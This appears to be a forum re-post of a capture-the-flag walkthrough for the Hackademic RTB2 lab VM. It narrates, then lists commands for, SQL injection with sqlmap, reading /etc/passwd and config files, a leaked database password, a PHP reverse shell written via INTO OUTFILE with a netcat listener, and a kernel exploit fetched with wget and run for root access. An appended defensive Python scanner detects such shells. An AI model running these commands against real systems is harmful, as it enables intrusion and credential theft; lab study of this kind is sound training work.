Re: [Video] Hackademic RTB2
"PHPMyAdmin" is a web based GUI interface to manage MySQL databases, which the attacker discovers is running on one of the web services. Using the credentials gathered from the configuration file, the attacker is able to login as the database administrator. The attacker crafts an SQL query to attempt to write a PHP file into the root web folder and then access it using firefox. The result is that the attacker is able to write files and execute PHP commands.
To be able to remotely interact with the target, the attacker chooses to use the "PHP-pentest-monkey" shell. The attacker creates a clone copy to work on and edits the file with their IP address as the shell will be remotely connecting back to them (and the shell needs to know where the attacker is), altering the port as well as removing the start & end PHP statements as they will already be in place. Upon updating the file, the attacker encodes the shell using base64 via "msfvenom" as this will not affect the SQL statement which will be used to create the file. Before triggering the web shell, the attacker uses netcat again to listen on the same port used in the web shell. Once everything is in place, the attacker calls the web shell, causing the target to execute the PHP function to decode the backdoor, making a connection back to the attacker. This gives the attacker command line access to the target with the same permissions as the web server.
The attacker wishes to gain deeper access into the system by escalating privileges. To do so one common method is by exploiting the kernel (this ONLY works if it is the 'correct' version!). The attacker finds the target's kernel version, searches their local copy of a public exploit database "exploit-db" and discovers a potential exploit which matches the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' at the top of the file as it would stop the file compiling (it is common with exploits to have 'shout outs' here), copies a version to their local web root folder and gives permission to the file to make sure every user has access to the file. After everything is ready the attacker then starts a web server.
Controlling the target, the attacker is able to locate a folder which they have permission to write to and execute files from. Afterwards they instruct the target to download the exploit code from the attacker and compile it. Upon execution the attacker has now got root access on the target's machine.
Game over
When they explore root's personal home folder, they notice the "key" file. The attacker notices the text file extension and views the content; upon doing so, they see the message has been encoded. The "=" at the end of the message is a common sign that base64 has been used. The attacker pastes the message back into burp and decodes it. Seeing the mention of "png" hints that the decoded value is an image file. After using the web site "opinionatedgeek.com" to decode and download the file, the attacker checks the file signature. It appears to be a valid png file format and opens it up to reveal the 'flag/proof', indicating the end goal.
Game over...again
Commands
Code:
netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.112 -p 1-65535 && us -H -mU -Iv 192.168.0.112 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.112 # Scans very quick, didn't need ETA via -v
BT -> firefox -> 192.168.0.112
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Firefox -> admin:password
// burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: admin Password: ' OR 1=1--' etc etc # NOT 'OR 1=1--' (User can be anything)
Copy (black) test -> decoder -> url -> ASCII HEX
echo "<binary>" | sed "s/ /;\&#/g;s/ //g;s/^/&#/;s/$/;/" # Somehow it's do-able in burp, Just can't figure it out! =(
// Burp -> Binary -> HTML
// Firefox -> Google -> ascii convert online -> http://home2.paulschou.net/tools/xlate/ -> HEX -> HEX -> Binary
nmap -p 666 -T4 -A -v 192.168.0.112
for x in 1001 1101 1011 1001; do
nc -z 192.168.0.112 $x
done
nmap -p 666 -T4 -A -v 192.168.0.112
// firefox -> 192.168.0.112:666 -> List of content items...
cd /pentest/database/sqlmap
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --passwords
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dbs
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --tables -D joomla
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-default
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php # Joomla default
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/ # root yUtJklM97W
cp /pentest/backdoors/web/webshells/php-reverse-shell.php /tmp/bd.php
cd /tmp
nano +w bd.php # edit IP address
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=bd.php
nc -lvvp 1234
sql -> select "<?php msfoutput ?>" INTO OUTFILE "/var/www/backdoor.php";
#w; last; uname -a; id; ls -lah;
#netstat -antp
#ps aux
##ls -lahR /home
uname -r
cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Privilege Escalation" | grep 2.6.3
head platforms/linux/local/14814.c
cp platforms/linux/local/14814.c /var/www/root.c
chmod 755 /var/www/root.c
/etc/init.d/apache2 start
ls -lah /
cd /tmp
wget 192.168.0.162/root.c
gcc root.c -o root
./root
whoami
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root
cat /root/Key.txt
// Burp -> Decoder -> Base64
#---Notes---
#Joomla: 1.5.22 # User: Administrator
#phpMyAdmin: 3.3.2.0
#curl http://192.168.0.112:666/phpmyadmin/changelog.php
#curl http://192.168.0.112:666/robots.txt
#curl http://192.168.0.112:666/htaccess.txt
Notes
- When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
- Some mistakes in the video are more obvious.
- Instead of using "PHP-Reverse-Shell" & "netcat", "PHP Meterpreter" & "Metasploit" could have been used.
- It is worth downloading Joomla to be familiar with a default configuration.
- The target uses DHCP to obtain an IP address.
- The selection area to record was not aligned when I recorded it.
Song(s): Martin Solveig & Dragonette - Hello & Klaas meets Haddaway - What is love (Klaas Radio Edit) & Scotty - The Black Pearl (Dave Darell Radio Edit) & Trent Reznor & Atticus Ross - In the Hall of the Mountain King (The Social Network) & Charlie Clouser - The Final Zepp
Video length: 13:47
Capture length: 64:30
Blog Post: http://g0tmi1k.blogspot.com/2012/01/...emic-rtb2.html
Forum Post: http://www.backtrack-linux.org/forum...l=1#post211962
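Written from the defender's side, as an added example that is not from the original post: a Python scanner for the web-shell drop described in the walkthrough, flagging PHP files with the eval(base64_decode(...)) shape the php/base64 encoder produces and listing world-writable web-root directories that let a database account land a file there via INTO OUTFILE. The sample web root it builds is constructed for the demo.

```python
# Added example, not from the original post: defender-side check for an
# encoded PHP backdoor dropped into a web root (e.g. via SQL INTO OUTFILE),
# plus the permission weakness that makes the drop possible.
import base64
import os
import re
import stat
import tempfile

CHECKS = [
    ("eval(base64_decode(...))", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("long base64 literal", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")),
]

def classify_php(text):
    """Reasons a PHP source looks like an encoded backdoor (empty if clean)."""
    return [label for label, rx in CHECKS if rx.search(text)]

def scan_webroot(root):
    """Map each suspicious .php file under root (path relative to root) to its reasons."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reasons = classify_php(fh.read())
                if reasons:
                    hits[os.path.relpath(path, root)] = reasons
    return hits

def world_writable_dirs(root):
    """Directories under root that any local user can write to. Mitigation: tighten
    permissions and set MySQL's secure_file_priv so INTO OUTFILE is confined."""
    return [os.path.relpath(d, root) for d, _, _ in os.walk(root)
            if os.stat(d).st_mode & stat.S_IWOTH]

def make_sample_webroot():
    """Constructed sample web root: a clean page, a backdoor-shaped file, an open dir."""
    root = tempfile.mkdtemp()
    payload = base64.b64encode(b"echo 'constructed sample, not a shell';" * 6).decode()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "backdoor.php"), "w") as fh:
        fh.write(f'<?php eval(base64_decode("{payload}")); ?>\n')
    os.makedirs(os.path.join(root, "uploads"))
    os.chmod(os.path.join(root, "uploads"), 0o777)
    return root
```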